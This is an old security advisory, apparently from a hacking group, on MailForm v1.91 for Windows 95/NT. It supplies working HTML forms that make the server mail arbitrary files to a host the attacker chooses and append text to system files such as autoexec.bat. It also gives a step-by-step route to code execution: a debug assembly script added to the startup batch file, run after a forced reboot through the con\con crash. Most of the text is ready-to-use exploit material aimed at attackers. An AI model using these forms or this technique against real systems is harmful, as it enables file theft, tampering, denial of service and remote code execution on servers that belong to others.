Advisory: MailForm v1.91 for Windows 95 and NT 4.0
Chopsui-cide[MmM]
The Mad Midget Mafia - http://midgets.box.sk/
=======================================================================
Do not save this with any editor, or _vital_ formatting may be lost.

Disclaimer:
=============
This document is intended as an advisory, and I cannot be held
accountable for its misuse. The reader assumes all responsibility for
his/her use of this information.

Summary:
==========
Date released: 07/04/2000 (dd/mm/yyyy).
Risk: denial of service, reading of private files, appending to
private files, full system compromise if the afforementioned risks
are leveraged properly.
Vulnerability found by: Chopsui-cide
Vulnerable: MailForm v1.91, probably prior versions (not tested).
Immune: ?

MailForm allows potentially dangerous parameters to be specified by
anyone who can execute it. These allow for reading and writing of
files on the system on which MailForm resides.

Details:
==========
Problem fields:
_1_TextLog -
_1_HTMLLog - these two are the ones used to write to files.
_1_MailTemplate - this is what is used to retrieve files.
_1_INIFile - possibly dangerous, but not discussed here.
_1_MailServer - we can just change this to our own address.
_1_MailTo - we don't even need to bother with this.

It's fairly obvious where the problem lies here. We can specify any
file to send + the POP server to send it to. The con\con bug may also
be used to bring down the entire system. Template files will be cut
off at the first null character, so retrieving of binaries is not
practical. Trying to retrieve certain files will cause MailForm to
crash.

A very crude example of how to run code on the remote system is
provided in the last section of this advisory.

Implementation: web interface
===============================
I have constructed some html that allows an attacker to download and
append to files on any remote system running MailForm (cut where it
says [snip], obviously):

[snip]
<html>
<title>Web interface for MailForm vulnerabilities.</title>
</head>
Do not be alarmed by any "Form submission failed" errors. These are
normal. You will need to modify the form tags in this page to
correspond to the host being attacked.<br>
<br>
Download file:<br>
<body bgcolor="#FFFFFF">

          <form method="POST" action="http://localhost/cgi-bin/mailform.exe">
            <input type="text" name="_1_MailServer" value="yourhost"><br>
            <input type="text" name="_1_MailTemplate" value="..\xitami.aut"><br>
                <input type="hidden" size="30" name="_1_MailTo" value="me@isp.com">
                <input type="hidden" size="40" name="Name" value="me">
            <input type="submit" value="Send" name="_2_Submit">
          </form>
<br>
Append to file:<br>
Note: your text will be preceeded by garbage.<br>
<body bgcolor="#FFFFFF">
          <form method="POST" action="http://localhost/cgi-bin/mailform.exe">
            <input type="hidden" name="_1_MailServer" value="x">
            <input type="hidden" name="_1_MailTemplate" value="nul">
            <input type="text" name="_1_TextLog" size="40" value="c:\autoexec.bat"><br>
                <input type="hidden" size="30" name="_1_MailTo" value="me@isp.com">
                <textarea name="Name" rows="4" cols="40"></textarea>
            <br><input type="submit" value="Send" name="_2_Submit">
          </form>
<a href="http://midgets.box.sk">The Mad Midget Mafia</a><br>
</body>
</html>
[snip]

The e-mail will be sent to the host you specify on port 25. It should
be easy enough to capture using netcat.

Implementation: full compromise
=================================
When appending text to files, the following kind of ugly crap
preceeds it:
[snip]
Submitted at Thu Apr 06 22:14:49 2000 from 192.168.1.1

Name:
[snip]
Even with this handicap, we can still modify/create batch files.
This is how we will execute code.

The idea here is to create a kind of "script" for debug that will
assemble and execute a small program. It is basically just a list of
keystrokes. We then add an entry to autoexec.bat that executes it.
Fist we need to upload the following file to c:\windows\script.txt
[snip]

a 100
mov dx,10b
mov ah,09
int 21
mov ah,4c
int 21
db "Code has been executed.",0d,0a,"$"

g=100
q
[snip]

Make sure at the end of each line there is _no_ carriage return. Each
line should be terminated by \x0a (linefeed). Get rid of the carriage
returns (\x0d), ie:
a 100
mov dx,10b
mov ah,09
int 21
mov ah,4c
int 21
db "Code has been executed.",0d,0a,"$"

g=100
q


Add a newline (\x0d,\x0a) before the above, and submit the two lines
using the web-based interface.

Add the following line to any batch file that is executed upon start-up
(ie, autoexec.bat):
debug < c:\windows\script.txt

Check that everything is in order by trying to download both script.txt
and the batch file you modified.

Force a reboot using the con\con vulnerability. Once it restarts, the
code will be executed. I know this is a really ugly hack, but it works
(poor excuse). Also, make sure the garbage doesn't interfere with
anything (always put a newline before the start of your commands).

=======================================================================